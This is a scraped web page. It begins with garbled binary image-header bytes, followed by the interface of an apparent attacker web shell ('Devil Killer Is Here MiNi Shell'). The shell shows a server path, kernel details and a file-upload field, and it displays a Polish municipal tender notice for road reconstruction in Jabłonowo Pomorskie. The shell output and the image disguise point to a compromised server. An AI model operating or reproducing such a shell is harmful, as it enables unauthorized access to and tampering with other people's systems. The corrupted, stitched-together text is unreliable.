JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220722/0027335101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa drogi gminnej Budziszewo-Blizno, przebudowa drogi gminnej Budziszewo-Książki oraz przebudowa drogi gminnej w miejscowości Piecewo” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO I GMINA JABŁONOWO POMORSKIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118431</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Główna 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jabłonowo Pomorskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(56) 69-76-800</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(56) 69-79-001</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@jablonowopomorskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.jablonowopomorskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa drogi gminnej Budziszewo-Blizno, przebudowa drogi gminnej Budziszewo-Książki oraz przebudowa drogi gminnej w miejscowości Piecewo” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8b14d75d-09b6-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00273351</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016447/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa drogi gminnej Budziszewo-Blizno, przebudowa drogi gminnej Budziszewo-Książki oraz przebudowa drogi gminnej w miejscowości Piecewo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/643282 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Adres strony internetowej prowadzonego postępowania: https://platformazakupowa.pl/transakcja/643282 .<br/>2. Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18.07.2002 r. o świadczeniu usług drogą elektroniczną (tekst jedn. Dz. U. z 2020 r. poz. 344). Środkiem komunikacji elektronicznej, w niniejszym postępowaniu, jest platforma zakupowa, zwana dalej „Platformą”, dostępna pod adresem https://platformazakupowa.pl oraz formularz (moduł) „Wyślij wiadomość do zamawiającego” (dostępny na stronie postępowania). <br/>Uwaga - Formularz (moduł) „Wyślij wiadomość do zamawiającego” nie służy do składania ofert.<br/>3. Komunikacja za pośrednictwem poczty elektronicznej na/z adres/-u zamowienia.publiczne@jablonowopomorskie.pl jest dopuszczalna w wyjątkowych sytuacjach np. w przypadku problemów technicznych związanych z funkcjonowaniem Platformy (...).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe wymagania techniczne i organizacyjne zostały opisane w Rozdziale VIII SWZ, w „Regulaminie platformazakupowa.pl” (dostępnym pod adresem https://platformazakupowa.pl/strona/1-regulamin), który jest uzupełnieniem „Instrukcji dla wykonawców platformazakupowa.pl” . Założenie lub posiadanie na Platformie konta użytkownika jest równoznaczne z akceptacją przez wykonawcę warunków aktualnego regulaminu Platformy.<br/>Szczegółowe instrukcje korzystania z Platformy, w tym instrukcja składania ofert znajdują się pod adresem https://platformazakupowa.pl/strona/45-instrukcje .<br/>Wykonawca jest zobowiązany do sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>Zaleca się wykonawcom założenie bezpłatnego konta użytkownika na Platformie. W przeciwnym wypadku wykonawca będzie miał ograniczone funkcjonalności Platformy np. nie będzie widział wiadomości prywatnych od zamawiającego lub wycofania oferty bez kontaktu z CWK.<br/>W przedmiotowym postępowaniu ofertę i oświadczenie, o którym mowa w art. 125 ust. 1 PZP, składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Ofertę i inne dokumenty, o których mowa w SWZ należy wczytać jako załączniki na Platformie według Instrukcji dla Wykonawców dotyczących korzystania z Platformy.<br/>Zamawiający dopuszcza przesyłanie danych w formatach dopuszczonych w Rozporządzeniu Rady Ministrów z dnia 12.04.2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tekst jedn. Dz. U. z 2017 r. poz. 2247), tj. m.in. .doc, .odt, .docx, .txt, .xls, .xlsx, .xml, .ppt, .pdf, .jpg, .zip, .7Z. <br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg ze szczególnym wskazaniem na .pdf, zaś w celu ewentualnej kompresji danych zamawiający rekomenduje .zip lub .7Z .<br/>Zamawiający dopuszcza przesyłanie danych (oferty, dokumentów) w innych formatach plików, niewskazanych w Rozporządzeniu o którym mowa w Rozdziale VIII ust. 16 SWZ (np. .rar) o ile rozpakowanie oferty oraz odczytanie przesłanych dokumentów nie będzie powodowało po stronie zamawiającego powstania dodatkowych obowiązków związanych z nabyciem innego oprogramowania niż przewidziane w załączniku nr 2 do ww. Rozporządzenia oraz nie będzie generowało po stronie zamawiającego żadnych dodatkowych kosztów. W takim przypadku, do terminu składania ofert zaleca się, aby wykonawca potwierdził u zamawiającego czy format plików w jakim zamierza przekazywać dane/informacje nie wiążą się z nabyciem innego oprogramowania po stronie zamawiającego oraz czy otwarcie lub odczytanie przesłanych danych nie będzie generowało żadnych dodatkowych kosztów u zamawiającego. W przypadku niezastosowania się przez wykonawcę do zaleceń zawartych w zdaniu poprzednim, czego skutkiem będzie brak możliwości otwarcia oferty i zapoznania się z jej treścią przez zamawiającego, przesłane pliki i/lub dokumenty zostaną uznane za złożone nieskutecznie.<br/>Postępowanie o udzielenie niniejszego zamówienia prowadzone jest przy użyciu środków komunikacji elektronicznej pisemnie w języku polskim. Dokumenty sporządzone w języku innym niż polski składa się wraz z ich tłumaczeniem na język polski.<br/>Minimalne wymagania sprzętowo-aplikacyjne umożliwiające udział w niniejszym postępowaniu, w tym korzystanie z Platformy zawarto w Rozdziale VIII ust. 28 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 oraz art. 14 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwane dalej „RODO” informuje się, że:<br/>1)	administratorem danych osobowych jest Burmistrz Miasta i Gminy Jabłonowo Pomorskie, (dane kontaktowe Urząd Miasta i Gminy Jabłonowo Pomorskie, ul. Główna 28, 87-330 Jabłonowo Pomorskie).<br/>2)	Wyznaczono inspektora ochrony danych, z którym można się kontaktować pisemnie na adres: Urząd Miasta i Gminy Jabłonowo Pomorskie, ul. Główna 28, 87-330 Jabłonowo Pomorskie lub iodo@jablonowopomorskie.pl .<br/>3)	Pani / Pana dane będą przetwarzane w oparciu o art. 6 ust. 1 lit. c RODO (Dz. Urz. UE L 119 z 04.05.2016 r. ze zm.) w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 11.09.2019 r. Prawo zamówień publicznych.<br/>4)	Odbiorcami Pani / Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy z dnia 11.09.2019 r. Prawo zamówień publicznych (art. 18, art. 74), jak również inne podmioty upoważnione do odbioru danych osobowych na podstawie przepisów prawa lub zawartych z Administratorem umów, w tym podmioty zajmujące się obsługą informatyczną Administratora.<br/>5)	Dane po zrealizowaniu celu, dla którego zostały zebrane, będą przetwarzane do celów archiwalnych i przechowywane przez okres niezbędny do zrealizowania przepisów dotyczących archiwizowania danych obowiązujących u Administratora lub okresu trwałości projektu w przypadku otrzymania dofinansowania ze środków zewnętrznych.<br/>6)	Zamawiający informuje, że będzie przetwarzał dane osobowe w zakresie wskazanym w otrzymanej ofercie, dokumentach składanych przez wykonawcę oraz w publicznie dostępnych rejestrach i bazach danych np. CEIDG, KRS (art. 14 ust. 1 lit. d, art. 14 ust. 2 lit. f).<br/>7)	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO, prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b)	na podstawie art. 16 RODO, prawo do sprostowania Pani/Pana danych osobowych, które są nieprawidłowe oraz prawo do uzupełnienia Pani/Pana danych osobowych, które są niekompletne. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu postępowania oraz jego załączników,<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa, w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (na adres Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa), gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. <br/>8)	Obowiązek podania przez Panią / Pana danych osobowych Zamawiającemu jest wymogiem związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. <br/>9)	Dane osobowe nie będą przetwarzane w sposób opierający się na zautomatyzowanym przetwarzaniu. Decyzje nie będą podejmowane w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani / Panu:<br/>a)	prawo do przenoszenia danych osobowych,<br/>b)	prawo do wycofania zgody na przetwarzanie danych osobowych,<br/>c)	prawo do wniesienia sprzeciwu wobec przetwarzania danych,<br/>d)	prawo do usunięcia danych osobowych, przed okresem o którym mowa w Rozdziale I ust. 10 pkt SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IIPP.271.1.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych na drogach położonych na terenie Gminy Jabłonowo Pomorskie, zgodnie z poniższym:<br/>1)	Przebudowa drogi wewnętrznej Budziszewo-Książki<br/>Lokalizacja robót: powiat brodnicki, gmina Jabłonowo Pomorskie, obręb Budziszewo, działki numer 98 oraz 102. Łączna długość przebudowywanej drogi 500 mb, w tym odcinek A-B o dł. 230 mb oraz odcinek C-D o dł. 270 mb. Zakres robót będzie obejmował m.in. wykonanie nowej konstrukcji jezdni drogi wewnętrznej oraz budowę/przebudowę zjazdów indywidualnych.<br/>2) Przebudowa drogi gminnej nr 080156C Budziszewo-Książki<br/>Lokalizacja robót: powiat brodnicki, gmina Jabłonowo Pomorskie, obręb Budziszewo, działki numer 108/1 oraz 114/1. Łączna długość przebudowywanej drogi 218 mb . Zakres robót będzie obejmował m.in. wykonanie nowej konstrukcji jezdni drogi gminnej oraz budowę/przebudowę zjazdów indywidualnych.<br/>3) Przebudowa drogi wewnętrznej Budziszewo-Blizno<br/>Lokalizacja robót: powiat brodnicki, gmina Jabłonowo Pomorskie, obręb Budziszewo, działki numer 114/1 oraz 141. Łączna długość przebudowywanej drogi 300 mb . Zakres robót będzie obejmował m.in. wykonanie nowej konstrukcji jezdni drogi wewnętrznej oraz budowę/przebudowę zjazdów indywidualnych.<br/>4) Przebudowa drogi gminnej nr 080135C w miejscowości Piecewo<br/>Lokalizacja robót: powiat brodnicki, gmina Jabłonowo Pomorskie, obręb Piecewo, działki numer: 20, 35/5, 37/3, 41/4 oraz 43. Łączna długość przebudowywanej drogi 706 mb . Zakres robót będzie obejmował m.in. wykonanie nowej konstrukcji jezdni drogi gminnej, budowę/przebudowę zjazdów indywidualnych, budowę chodnika, wykonanie hybrydowego oświetlenia ulicznego.<br/>Zamawiający informuje, że wystąpił do Ministra Cyfryzacji o zwolnienie zarządcy drogi z obowiązku budowy kanału technologicznego związanego z przebudową drogi gminnej nr 080135C w miejscowości Piecewo na działkach nr 20, 35/5, 37/3, 41/4 oraz 43. Obecnie oczekujemy za decyzją administracyjną w przedmiotowej sprawie.<br/>2.	Szczegółowy opis przedmiotu zamówienia oraz dokumentację techniczną opisu przedmiotu zamówienia, zawarto odpowiednio w Rozdziale III SWZ oraz w treści załącznika nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">31520000-7 - Lampy i oprawy oświetleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska najwyższą łączną liczbę punktów za wszystkie kryteria oceny ofert wg wzoru LP = C + T, gdzie: <br/>LP - to całkowita liczba punktów przyznana ofercie,<br/>C - liczba punktów przyznana ofercie za kryterium „Cena”,<br/>T – to liczba punktów przyznana ofercie za kryterium „Termin wykonania zamówienia”,<br/>końcowy wynik zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Ocenie będą podlegały oferty nieodrzucone.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dot. zdolności technicznej lub zawodowej – Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>1) posiada doświadczenie w przedmiocie zamówienia, tj. jeżeli Wykonawca wykaże, że nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną o wartości pojedynczej umowy nie mniejszej niż 1 500 000,00 zł brutto. Przy czym ww. robota musi obejmować: budowę lub przebudowę drogi o:<br/>a) nawierzchni: bitumicznej lub z betonu asfaltowego lub z mieszanki mineralno-bitumicznej oraz<br/>b) długości drogi nie mniejszej niż 700 metrów lub o powierzchni jezdni nie mniejszej niż 3 900,00 m2.<br/>Jeżeli Wykonawca wykonał zamówienie w walutach obcych Zamawiający przeliczy ich wartość przyjmując średni kurs PLN od tej waluty podanej przez NBP na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych;<br/>2) będzie dysponował w realizacji zamówienia co najmniej jedną osobą wykonującą zadania kierownika budowy, która:<br/>a) będzie posiadała co najmniej wykształcenie średnie oraz uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej w co najmniej ograniczonym zakresie oraz co najmniej 5 lat doświadczenia zawodowego przy budowie lub przebudowie dróg na stanowisku kierownika budowy lub<br/>b) która będzie posiadała co najmniej wykształcenie średnie oraz inne ważne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej, wydane na podstawie wcześniej obowiązujących przepisów prawa, oraz co najmniej 5 lat doświadczenia zawodowego przy budowie lub przebudowie dróg na stanowisku kierownika budowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Od wykonawcy, którego oferta zostanie najwyżej oceniona, na wezwanie zamawiającego o którym mowa w art. 274 ust. 1 PZP zamawiający będzie wymagał:<br/>1)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, tj. art. 108 ust. 1 pkt 1-2 PZP, art. 108 ust. 1 pkt 4 PZP, zamiast podmiotowych środków dowodowych, o których mowa w 